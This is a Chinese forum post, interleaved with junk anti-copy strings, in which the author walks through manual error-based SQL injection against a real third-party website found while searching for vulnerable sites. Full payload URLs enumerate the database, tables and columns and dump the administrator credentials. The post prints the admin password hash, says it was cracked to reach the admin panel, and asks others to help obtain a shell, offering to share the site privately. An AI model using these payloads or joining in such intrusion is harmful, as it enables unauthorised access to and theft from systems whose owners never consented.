近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。
% L6 m- s) o5 z首先找到网站后台,加了个admin,后台出来了 3 r2 m' ^- Y& T" S8 O
/ z8 x9 L. j2 `3 b, r5 E$ a
6 X q$ W1 Y6 Z2 v1 [
然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入; q/ n1 b8 }* ?2 L2 O; K, G
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—
) ^! x* J0 ]" \' G. n- Y" N) r: f. N5 S) w7 V
- h7 h0 E1 B$ p. l9 v: O
( F/ [5 T7 j$ w7 d9 B* D/ k5 D' B" V3 P5 p( `5 p2 }
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg
9 ^1 ~7 p7 a0 r4 F+ f" [% I/ E% A/ u) x# O5 h7 h
, Y) A7 t8 E6 w8 N+ k! U, U# G9 P' U$ v$ v. S$ E
% H0 c8 e7 p4 p8 u, L5 }- Q可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator
. ]0 r, Z$ u1 _; w4 `
/ ^$ } |% q7 U, ^
+ Z% _2 a4 O! X" `5 F% i1 L* ?http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg6 Z$ p: t: q& L: A5 W, F8 j' Q6 z
1 V5 \0 n% v6 N7 m, @6 K+ y" k
' a" l* d' Y! D0 E: J$ }. t8 M% d 查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))-- H! V6 M' p/ Z9 X% L9 K
! J( u% j9 J3 }8 H& [% `. X4 q+ ]
7 n6 y+ n$ F) l, Y. g) {; f3 Z1 s1 h- k K7 a0 I" z3 q
得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--
0 x2 J X1 q2 x2 F; \* b9 t5 b1 [, f Q; B! {
9 x- i5 b: c9 ^9 \$ D
- P9 y1 f9 @' n2 }, D+ v/ p 得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 |